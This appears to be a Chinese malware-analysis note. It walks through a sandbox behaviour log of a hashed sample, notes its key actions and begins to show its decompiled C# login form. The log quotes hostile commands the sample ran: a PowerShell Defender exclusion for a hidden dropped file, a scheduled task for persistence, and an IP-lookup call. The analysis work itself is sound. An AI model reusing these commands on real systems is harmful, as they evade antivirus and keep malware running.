C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll, base:0x00000000742C0000 size:0x0020F000 , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 09:33:19:400, WerFault.exe, 8148:0, 2928, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ], 09:33:19:413, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:413, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:413, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:413, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:431, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 09:33:19:431, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:431, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp, , 0x00000000 [操作成功完成。 ], 09:33:19:431, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:19:444, WerFault.exe, 8148:8152, 2928, FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml, offset:0x00000000 datalen:0x00001323 , 0x00000000 [操作成功完成。 ], 09:33:19:444, WerFault.exe, 8148:0, 2928, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml, , 0x00000000 [操作成功完成。 ], 09:33:19:526, WerFault.exe, 8148:5004, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:526, WerFault.exe, 8148:5004, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:526, WerFault.exe, 8148:5004, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:526, WerFault.exe, 8148:5004, 2928, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:19:539, WerFault.exe, 8148:984, 2928, REG_mkkey, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData, access:0x0002001B , 0x00000000 [操作成功完成。 ], 09:33:19:539, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\ClockTimeSeconds, type:0x0000000B datalen:8 data:'DF 4A ED 64 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:19:539, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\TickCount, type:0x0000000B datalen:8 data:'25 9E 03 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:7324, 2928, FILE_truncate, C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, eof:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:7324, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, offset:0x00000000 datalen:0x00000040 , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive, , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:7324, 2928, FILE_truncate, C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log, eof:0x00000000 , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:7324, 2928, FILE_write, C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log, offset:0x00000000 datalen:0x00000902 , 0x00000000 [操作成功完成。 ], 09:33:19:804, powershell.exe, 5080:0, 2928, FILE_modified, C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log, , 0x00000000 [操作成功完成。 ], 09:33:19:820, conhost.exe, 7172:0, 2928, EXEC_destroy, C:\Windows\System32\conhost.exe, parent_pid:5080 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' , 0x00000000 [操作成功完成。 ], 09:33:19:820, powershell.exe, 5080:0, 2928, EXEC_destroy, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' , 0x00000000 [操作成功完成。 ], 09:33:20:366, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018000B6180B055, type:0x00000003 datalen:346 data:'01 00 00 00 01 00 00 00 D0 8C 9D DF 01 15 D1 11 ' , 0x00000000 [操作成功完成。 ], 09:33:20:366, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\DeviceTicket, type:0x00000003 datalen:2282 data:'01 00 00 00 01 00 00 00 D0 8C 9D DF 01 15 D1 11 ' , 0x00000000 [操作成功完成。 ], 09:33:20:366, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\DeviceId, type:0x00000001 datalen:34 data:'30 30 31 38 30 30 30 42 36 31 38 30 42 30 35 35 ' , 0x00000000 [操作成功完成。 ], 09:33:20:366, WerFault.exe, 8148:984, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\ApplicationFlags, type:0x00000004 datalen:4 data:'01 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:20:382, WerFault.exe, 8148:5004, 2928, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 09:33:20:475, WerFault.exe, 8148:8004, 2928, NET_connect, 52.168.117.173:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:33:20:711, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:195 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:4380 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:104 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:20:945, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:158 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:179, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:51 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:179, WerFault.exe, 8148:8004, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:21:179, WerFault.exe, 8148:8004, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:21:179, WerFault.exe, 8148:8004, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:21:179, WerFault.exe, 8148:8004, 2928, REG_setval, HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList, type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' , 0x00000000 [操作成功完成。 ], 09:33:21:194, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:1112 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:194, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:4125 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:194, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:836 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:819, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:956 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:33:21:819, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive, filter:'*_*_*_*_*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_484cb55c9a21365077a1c68a7b9e5e3cb2ef7722_e228f3e3_215782e1, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_6aff93876c44371897d1e8f3858937fb52c494b2_e228f3e3_250f7b02, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_776da5ffe2586954ea640af31356f08d6f957_e228f3e3_086773fd, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_95f6d93027ad781764f63e817714e23f481bb_e228f3e3_06378ac1, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_c260964a7f98f65ed93360ecba442716ad992e76_e228f3e3_27d79233, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_d09b36efc1ab823262e4447d9e591ac48e5997_e228f3e3_11bb643e, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_f84eeb62496d5a853d8f5eb857cf87ded2dac7c2_e228f3e3_253b6bfe, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.SkypeA_145397beb22a18b8f2e1ca19a6432416ebb65d7_a1837349_189e5fec, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_877cc3bf84bfd74bbcaeb9ff7ebafc9d7431acc6_d0dcfc74_182671de, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_e77e25b240783efe1581bc847cca6cdb2bdbcfc_e5c57aa7_18266c31, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.YourPh_8877c8bde7fa9a9c5de09dc7b9181a7eabfe680_3a1a0f1d_0c365e66, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_OneDrive.exe_79a15a9e6a5728ac489be495d0f32616b2ecd7_be72a7c1_09779752, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_193e9ef5, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_1f11520f, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_205ea9bf, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Procmon64.exe_c09532f9985b38eb8e45674be1656687cd9197_ed45741f_1b84066a, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3025__478811c0481f9875deb83cbacc375e7afbeb849_00000000_0a03c628, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266_e0c719d0ed7ee1aea59de04a38aa654a7c8435_00000000_12cc76cc, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266__7c8945cffcc7f3887b6b9b7e1e5517ab5968fd6f_00000000_04d90897, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266__7c8945cffcc7f3887b6b9b7e1e5517ab5968fd6f_00000000_0e873073, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_1cecfbec1fce2338d92f0fbce2327564f692bca_00000000_17b3b1ba, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_79fea5be87178577dda92ecb6203330c7841a6a_00000000_121cb425, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_c4a938beb533dfcfe565ac4db8c3e59c073d44a_00000000_0278268c, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_MicrosoftEdgeUpd_4df8dce2697bd23aa5ebc0def77646d714659a7c_00000000_18254686, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_MicrosoftEdgeUpd_7b16be7bdf552bdc43e24804272db49eab32bbd_00000000_1f4a525c, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0976b8b2, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_09779212, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_09779bf5, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0ccecc6a, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0ebde483, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_224e23fe, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_635d72ba1e42ee980484185cb023e6401bfae3_00000000_0b4486c8, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_635d72ba1e42ee980484185cb023e6401bfae3_00000000_0f6784fe, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_e85b952bb8dc9585c0b96537f30aec9168cfba_00000000_0f6780b8, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_X_c07298f5c3918c4755303fd2741546b048d9a67c_00000000_13937c31, filter:'*' , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f, access:0x00100001 alloc_size:0 attrib:0x00000080 share_access:0x00000003 disposition:0x00000002 options:0x00200021 , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer, access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_chmod, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer, attrib:0x00002080 , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_write, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:0, 2928, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer, , 0x00000000 [操作成功完成。 ], 09:33:21:835, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp, , 0x00000000 [操作成功完成。 ], 09:33:21:850, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ], 09:33:21:850, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml, , 0x00000000 [操作成功完成。 ], 09:33:21:850, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DB8.tmp.csv, , 0x00000000 [操作成功完成。 ], 09:33:21:850, WerFault.exe, 8148:8152, 2928, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DC9.tmp.txt, , 0x00000000 [操作成功完成。 ], 09:33:21:850, WerFault.exe, 8148:0, 2928, EXEC_destroy, C:\Windows\SysWOW64\WerFault.exe, parent_pid:8816 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' , 0x00000000 [操作成功完成。 ], 09:33:21:867, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, EXEC_destroy, C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' , 0x00000000 [操作成功完成。 ],
几个关键:
1、执行powershell:
powershell.exe, 5080:0, 2928, EXEC_create, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' image_base:0x0000000001150000 image_size:0x0006C000 , 0x00000000 [操作成功完成。 ],
2、BA_extract_hidden 释放隐藏文件释放文件路径名(行为监控) BA_extract_hidden, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, , 0x00000000 [操作成功完成。 ]
Time & API | Arguments | Status | Return |
---|---|---|---|
2023/05/28 21:16:58 SetFileAttributesW |
file_attributes:8199
filepath:C:\Users\Admin\AppData\Roaming\bWyPLjwQzmw.exe
filepath_r:C:\Users\Admin\AppData\Roaming\bWyPLjwQzmw.exe
|
1 | 1 |
3、创建计划任务 EXEC_create, C:\Windows\SysWOW64\schtasks.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' image_base:0x0000000000EE0000 image_size:0x00033000 , 0x00000000 [操作成功完成。 ],
4、联网:09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_http, checkip.dyndns.org/, protocol:(TCP)0 cmd:'GET' , 0x00000000 [操作成功完成。 ],
09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_send, 193.122.130.0:80, protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:475, WerFault.exe, 8148:8004, 2928, NET_connect, 52.168.117.173:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ],
09:33:20:711, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:195 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:4380 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:104 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:158 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:21:179, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:51 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
综上,实际运行基本上和微步表现的行为类似!
https://s.threatbook.com/report/file/99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292
入口:
分析下这个类的作用:
using System; using System.Collections.Generic; using System.ComponentModel; using System.Drawing; using System.Reflection; using System.Windows.Forms; using BusinessLayer; using Entities; namespace UILayer { // Token: 0x02000003 RID: 3 public class LoginForm : Form { // Token: 0x06000002 RID: 2 RVA: 0x0000206B File Offset: 0x0000026B public LoginForm() { this.InitializeComponent(); } // Token: 0x06000003 RID: 3 RVA: 0x00002099 File Offset: 0x00000299 private void btnExit_Click(object sender, EventArgs e) { Application.Exit(); } // Token: 0x06000004 RID: 4 RVA: 0x000020A4 File Offset: 0x000002A4 public void btnLogin_Click_1(object sender, EventArgs e) { this._log.Id = this.tbUserID.Text; this._log.Password = this.tbPassword.Text; bool flag = this.tbUserID.Text != "" && this.tbPassword.Text != ""; if (flag) { bool flag2 = this.posBusiness.CheckLogin(this._log); if (flag2) { bool flag3 = this.posBusiness.GetTitle(this._log) == "PosEmployee"; if (flag3) { base.Hide(); PosSystem _pos = new PosSystem(); _pos.Show(); } else { bool flag4 = this.posBusiness.GetTitle(this._log) == "Manager"; if (flag4) { base.Hide(); ManagerForm _manager = new ManagerForm(); _manager.Show(); } else { bool flag5 = this.posBusiness.GetTitle(this._log) == "InventoryEmployee"; if (flag5) { base.Hide(); ViewInventory _inventory = new ViewInventory(); _inventory.Show(); } } } } else { MessageBox.Show("Login Failed!", "Warning", MessageBoxButtons.RetryCancel, MessageBoxIcon.Exclamation); } } else { MessageBox.Show("Login Failed!", "Warning", 